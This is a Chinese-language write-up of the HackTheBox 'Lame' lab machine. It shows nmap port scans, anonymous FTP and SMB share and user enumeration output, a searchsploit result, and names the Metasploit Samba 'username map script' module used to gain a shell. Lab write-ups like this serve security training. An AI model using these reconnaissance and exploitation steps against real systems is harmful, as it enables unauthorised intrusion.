| 机器信息 | lame |
|---|---|
| 状态 | 退役 |
| 系统 | linux |
| 技巧 | ftp服务器 vsftp 2.3.4 以及smb samba 3.0.20 用户枚举漏洞 msf getshell |
嘿嘿 今天又是打靶场的一天 顺手挑了一个 可爱的windows 试试水啦!!!
继续 so easy之旅
循例信息收集
## └─# nmap -sS -p- 10.10.10.3 Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-20 16:06 CST Nmap scan report for 10.10.10.3 Host is up (0.016s latency). Not shown: 65531 filtered tcp ports (no-response) PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 139/tcp open netbios-ssn 445/tcp open microsoft-ds ## 详细信息 PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.3.4 |_ftp-anon: Anonymous FTP login allowed (FTP code 230) 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) | ssh-hostkey: | 1024 600fcfe1c05f6a74d69024fac4d56ccd (DSA) |_ 2048 5656240f211ddea72bae61b1243de8f3 (RSA) 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Host script results: | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) |_smb2-time: Protocol negotiation failed (SMB2) |_clock-skew: -3m49s ftp端口 21
强扫描一下ftp
PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.3.4 |_ftp-bounce: bounce working! Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 2.4.X OS CPE: cpe:/o:linux:linux_kernel:2.4.37 OS details: DD-WRT v24-sp2 (Linux 2.4.37) Network Distance: 2 hops Service Info: OS: Unix 匿名登陆
| ftp协议bug | FTP匿名登录 |
|---|
445smb协议
| 看一下smb如何打 | smb 445| SMB 协议端口利用 |
|---|
### namp 脚本探测
> nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.29.173
PORT STATE SERVICE 445/tcp open microsoft-ds Host script results: | smb-enum-users: | LAMEbackup (RID: 1068) | Full name: backup | Flags: Account disabled, Normal user account | LAMEbin (RID: 1004) | Full name: bin | Flags: Account disabled, Normal user account | LAMEbind (RID: 1210) | Flags: Account disabled, Normal user account | LAMEdaemon (RID: 1002) | Full name: daemon | Flags: Account disabled, Normal user account | LAMEdhcp (RID: 1202) | Flags: Account disabled, Normal user account | LAMEdistccd (RID: 1222) | Flags: Account disabled, Normal user account | LAMEftp (RID: 1214) | Flags: Account disabled, Normal user account | LAMEgames (RID: 1010) | Full name: games | Flags: Account disabled, Normal user account | LAMEgnats (RID: 1082) | Full name: Gnats Bug-Reporting System (admin) | Flags: Account disabled, Normal user account | LAMEirc (RID: 1078) | Full name: ircd | Flags: Account disabled, Normal user account | LAMEklog (RID: 1206) | Flags: Account disabled, Normal user account | LAMElibuuid (RID: 1200) | Flags: Account disabled, Normal user account | LAMElist (RID: 1076) | Full name: Mailing List Manager | Flags: Account disabled, Normal user account | LAMElp (RID: 1014) | Full name: lp | Flags: Account disabled, Normal user account | LAMEmail (RID: 1016) | Full name: mail | Flags: Account disabled, Normal user account | LAMEman (RID: 1012) | Full name: man | Flags: Account disabled, Normal user account | LAMEmsfadmin (RID: 3000) | Full name: msfadmin,,, | Flags: Normal user account | LAMEmysql (RID: 1218) | Full name: MySQL Server,,, | Flags: Account disabled, Normal user account | LAMEnews (RID: 1018) | Full name: news | Flags: Account disabled, Normal user account | LAMEnobody (RID: 501) | Full name: nobody | Flags: Account disabled, Normal user account | LAMEpostfix (RID: 1212) | Flags: Account disabled, Normal user account | LAMEpostgres (RID: 1216) | Full name: PostgreSQL administrator,,, | Flags: Account disabled, Normal user account | LAMEproftpd (RID: 1226) | Flags: Account disabled, Normal user account | LAMEproxy (RID: 1026) | Full name: proxy | Flags: Account disabled, Normal user account | LAMEroot (RID: 1000) | Full name: root | Flags: Account disabled, Normal user account | LAMEservice (RID: 3004) | Full name: ,,, | Flags: Account disabled, Normal user account | LAMEsshd (RID: 1208) | Flags: Account disabled, Normal user account | LAMEsync (RID: 1008) | Full name: sync | Flags: Account disabled, Normal user account | LAMEsys (RID: 1006) | Full name: sys | Flags: Account disabled, Normal user account | LAMEsyslog (RID: 1204) | Flags: Account disabled, Normal user account | LAMEtelnetd (RID: 1224) | Flags: Account disabled, Normal user account | LAMEtomcat55 (RID: 1220) | Flags: Account disabled, Normal user account | LAMEuser (RID: 3002) | Full name: just a user,111,, | Flags: Normal user account | LAMEuucp (RID: 1020) | Full name: uucp | Flags: Account disabled, Normal user account | LAMEwww-data (RID: 1066) | Full name: www-data |_ Flags: Account disabled, Normal user account #### 用户信息 些用户是指在某个计算机系统或网络中创建的用户帐户。每个用户帐户都有一个唯一的标识符(RID),通常有一个用户名和一些其他信息,如全名或描述。用户帐户可以用来登录系统、执行特定任务或访问特定资源,具体取决于其权限和角色。 Account disabled 意味着该用户帐户已被禁用或停用。 | smb-enum-shares: | account_used: <blank> | 10.10.10.3ADMIN$: | Type: STYPE_IPC | Comment: IPC Service (lame server (Samba 3.0.20-Debian)) | Users: 1 | Max Users: <unlimited> | Path: C:tmp | Anonymous access: <none> | 10.10.10.3IPC$: | Type: STYPE_IPC | Comment: IPC Service (lame server (Samba 3.0.20-Debian)) | Users: 1 | Max Users: <unlimited> | Path: C:tmp | Anonymous access: READ/WRITE | 10.10.10.3opt: | Type: STYPE_DISKTREE | Comment: | Users: 1 | Max Users: <unlimited> | Path: C:tmp | Anonymous access: <none> | 10.10.10.3print$: | Type: STYPE_DISKTREE | Comment: Printer Drivers | Users: 1 | Max Users: <unlimited> | Path: C:varlibsambaprinters | Anonymous access: <none> | 10.10.10.3tmp: | Type: STYPE_DISKTREE | Comment: oh noes! | Users: 1 | Max Users: <unlimited> | Path: C:tmp |_ Anonymous access: READ/WRITE 解析: - `10.10.10.3ADMIN$`: 这是一个 IPC(Interprocess Communication)服务,允许管理员通过网络管理远程系统。它的路径是 `C:tmp`,并且没有匿名访问权限。 - `10.10.10.3IPC$`: 同样是一个 IPC 服务,路径也是 `C:tmp`,但是允许匿名用户读写访问。 - `10.10.10.3opt`: 这是一个磁盘树类型的共享资源,没有设置注释,路径是 `C:tmp`,并且没有匿名访问权限。 - `10.10.10.3print$`: 这是一个用于打印机驱动程序的共享资源,路径是 `C:varlibsambaprinters`,没有匿名访问权限。 - `10.10.10.3tmp`: 这是一个磁盘树类型的共享资源,注释是 "oh noes!",路径是 `C:tmp`,并且允许匿名用户读写访问。
|客户端链接共享资源|找到特定的资源如何做?
smbclient 工具 可以直接连接 某些匿名的服务
链接获取资源
Password for [WORKGROUProot]: Anonymous login successful Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers tmp Disk oh noes! opt Disk IPC$ IPC IPC Service (lame server (Samba 3.0.20-Debian)) ADMIN$ IPC IPC Service (lame server (Samba 3.0.20-Debian)) Reconnecting with SMB1 for workgroup listing. Anonymous login successful Server Comment --------- ------- Workgroup Master --------- ------- WORKGROUP LAME 看了一圈啥也没得唯一一个收获就是拿到了 samba 3.0.20-Debian 知道了版本 查一下
Exploit Title | Path ------------------------------------ --------------------------------- Samba 3.0.10 < 3.3.5 - Format Strin | multiple/remote/10095.txt Samba 3.0.20 < 3.0.25rc3 - 'Usernam | unix/remote/16320.rb Samba < 3.0.20 - Remote Heap Overfl | linux/remote/7701.txt Samba < 3.6.2 (x86) - Denial of Ser | linux_x86/dos/36741.py 注意一波这个***Samba 3.0.20 < 3.0.25rc3 - 'Usernam | unix/remote/16320.rb
| samba复现 | samba 3.0.20 -3.0.25rc3] |
|---|
samba 漏洞利用
msf 集成了 samba的漏洞
0 exploit/multi/samba/usermap_script 2007-05-14 excellent No Samba "username map script" Command Execution 常规设置不做赘述了 , 设置好直接开始用就可 直接就拿到 shell了 直接在makdis下查看user.txt 和root下查看
原文始发于微信公众号(探险者安全团队):小k梭靶场-HackTheBox-Lame
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论